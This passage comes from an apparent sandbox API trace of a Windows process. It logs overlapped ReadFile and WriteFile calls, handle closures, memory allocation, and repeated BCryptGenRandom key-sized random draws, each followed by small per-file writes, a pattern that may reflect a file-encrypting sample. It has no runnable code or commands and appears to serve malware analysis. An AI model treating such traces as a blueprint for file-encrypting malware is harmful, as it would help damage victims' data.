lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.774] CloseHandle (hObject=0x170) returned 1 [0169.774] free (_Block=0x3df0008) [0169.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.821] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x50a5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0169.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0169.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0169.853] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.853] free (_Block=0x3e305b8) [0169.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.853] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.854] free (_Block=0x1fa91d0) [0169.854] free (_Block=0x1fa2ed8) [0169.854] free (_Block=0x1fa90b8) [0169.854] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.855] CloseHandle (hObject=0x338) returned 1 [0169.855] free (_Block=0x3d70450) [0169.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.906] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0170.959] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6090, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0170.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0170.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0170.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0170.980] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0170.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0170.980] free (_Block=0x3e305b8) [0170.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0170.980] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0170.981] free (_Block=0x1fa91d0) [0170.981] free (_Block=0x1fa2ed8) [0170.981] free (_Block=0x1fa90b8) [0170.981] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0170.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0170.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0170.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0170.991] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0170.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0170.991] free (_Block=0x3e305b8) [0170.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0170.991] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0170.991] free (_Block=0x1fa91d0) [0170.991] free (_Block=0x1fa2ed8) [0170.991] free (_Block=0x1fa90b8) [0170.991] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0170.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.414] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.429] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.429] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.429] free (_Block=0x3e305b8) [0173.429] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.429] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.429] free (_Block=0x1fa91d0) [0173.429] free (_Block=0x1fa2ed8) [0173.429] free (_Block=0x1fa90b8) [0173.429] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0173.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.441] CloseHandle (hObject=0xec) returned 1 [0173.441] free (_Block=0x3d70450) [0173.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.454] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x78af, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0173.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.476] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.476] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.476] free (_Block=0x3e305b8) [0173.476] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.476] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.476] free (_Block=0x1fa91d0) [0173.476] free (_Block=0x1fa2ed8) [0173.476] free (_Block=0x1fa90b8) [0173.476] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.483] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0173.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.490] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xa445, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.503] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2ba2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0173.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.505] CloseHandle (hObject=0x338) returned 1 [0173.505] free (_Block=0x3f70048) [0173.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.506] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.507] CloseHandle (hObject=0x170) returned 1 [0173.507] free (_Block=0x3df0008) [0173.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.512] CloseHandle (hObject=0x308) returned 1 [0173.512] free (_Block=0x3fb00b8) [0173.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.541] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.541] free (_Block=0x3e305b8) [0173.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.541] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.541] free (_Block=0x1fa91d0) [0173.541] free (_Block=0x1fa2ed8) [0173.541] free (_Block=0x1fa90b8) [0173.541] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.548] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.548] free (_Block=0x3e305b8) [0173.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.548] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.549] free (_Block=0x1fa91d0) [0173.549] free (_Block=0x1fa2ed8) [0173.549] free (_Block=0x1fa90b8) [0173.549] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.554] CloseHandle (hObject=0xec) returned 1 [0173.554] free (_Block=0x1ff1e60) [0173.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.560] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.560] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.560] free (_Block=0x3e305b8) [0173.560] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.560] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.561] free (_Block=0x1fa91d0) [0173.561] free (_Block=0x1fa2ed8) [0173.561] free (_Block=0x1fa90b8) [0173.561] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.580] CloseHandle (hObject=0x170) returned 1 [0173.580] free (_Block=0x3ef0008) [0173.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.589] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.590] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.614] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x776, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.621] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xb12, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.646] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.649] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.652] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.652] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.652] free (_Block=0x3e305b8) [0173.652] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.652] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.652] free (_Block=0x1fa91d0) [0173.652] free (_Block=0x1fa2ed8) [0173.652] free (_Block=0x1fa90b8) [0173.652] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.658] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.706] CloseHandle (hObject=0x170) returned 1 [0173.706] free (_Block=0x1ff1e60) [0173.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, 